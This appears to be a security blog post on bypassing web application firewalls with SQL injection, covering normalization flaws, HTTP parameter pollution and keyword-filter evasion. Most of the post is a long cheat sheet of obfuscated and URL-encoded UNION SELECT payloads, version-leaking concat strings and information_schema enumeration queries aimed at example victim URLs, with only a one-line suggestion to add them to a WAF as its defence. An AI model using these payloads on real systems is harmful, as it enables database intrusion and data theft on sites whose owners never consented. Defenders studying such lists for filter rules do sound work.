0 0
Read Time:4 Minute, 5 Second

SQL injection bypass WAF is one of the most dangerous techniques we will show you today how hackers bypass your waf and how to fix it

most of WAF’s block usual SQLI commands and orders for example if you use order by 1– or union select the WAF well block you and that good for now

what hackers do is bypass the simple WAF by adding some letters and codes and that actually work !

for example to do union select they use /*!5000UnIoN*!/+/*!5000SeLeCt*!/ and this order will bypass the WAF easily !

Bypassing WAF: SQL Injection – Normalization Method Example Number (1) of a vulnerability in the function of request Normalization. • The following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request

 will be successfully performed  /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source. Example Number (2) of a vulnerability in the function of request Normalization. • Similarly, the following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

 /?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become

 SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

‘Using HTTP Parameter Pollution (HPP)

• The following request doesn’t allow anyone to conduct an attack

 /?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP

 /?id=1;select+1&id=2,3+from+users+where+id=1--

 

and here is some bypass string

/*!%55NiOn*/ /*!%53eLEct*/   %55nion(%53elect 1,2,3)-- -   +union+distinct+select+   +union+distinctROW+select+   /**//*!12345UNION SELECT*//**/   concat(0x223e,@@version)   concat(0x273e27,version(),0x3c212d2d)   concat(0x223e3c62723e,version(),0x3c696d67207372633d22)   concat(0x223e,@@version,0x3c696d67207372633d22)   concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)   concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)   concat(‘’,@@version,’’)   /**//*!50000UNION SELECT*//**/   /**/UNION/**//*!50000SELECT*//**/   /*!50000UniON SeLeCt*/   union /*!50000%53elect*/   +#uNiOn+#sEleCt   +#1q%0AuNiOn all#qa%0A#%0AsEleCt   /*!%55NiOn*/ /*!%53eLEct*/   /*!u%6eion*/ /*!se%6cect*/   +un/**/ion+se/**/lect   uni%0bon+se%0blect   %2f**%2funion%2f**%2fselect   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A   REVERSE(noinu)+REVERSE(tceles)   /*--*/union/*--*/select/*--*/   union (/*!/**/ SeleCT */ 1,2,3)   /*!union*/+/*!select*/   union+/*!select*/   /**/union/**/select/**/   /**/uNIon/**/sEleCt/**/   /**//*!union*//**//*!select*//**/   /*!uNIOn*/ /*!SelECt*/   +union+distinct+select+   +union+distinctROW+select+   +UnIOn%0d%0aSeleCt%0d%0a   UNION/*&test=1*/SELECT/*&pwn=2*/   un?+un/**/ion+se/**/lect+   +UNunionION+SEselectLECT+   +uni%0bon+se%0blect+   %252f%252a*/union%252f%252a /select%252f%252a*/   /%2A%2A/union/%2A%2A/select/%2A%2A/   %2f**%2funion%2f**%2fselect%2f**%2f   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A   /*!UnIoN*/SeLecT+

Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7 Illegal mix of Collations ByPass Method : unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

   /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

   union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

 

and the other methods will be replaced keywords ad we mentioned above

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

Some case SQL keyword was filtered out and replaced with whitespace. So we can use “%0b” to bypass.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

 

 http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….


what to you need to do is to add the list of strings that showed in this aritcles to your waf
or contact your web security provider to avoid those strings and avoide SQL injection bypass WAF
a
and read more about web security here
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
claim free dogecoin Previous post claim free dogecoin every hour no signup
Next post Website Vulnerability Scanner online for website exploits

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

Leave a Reply

Your email address will not be published. Required fields are marked *

Close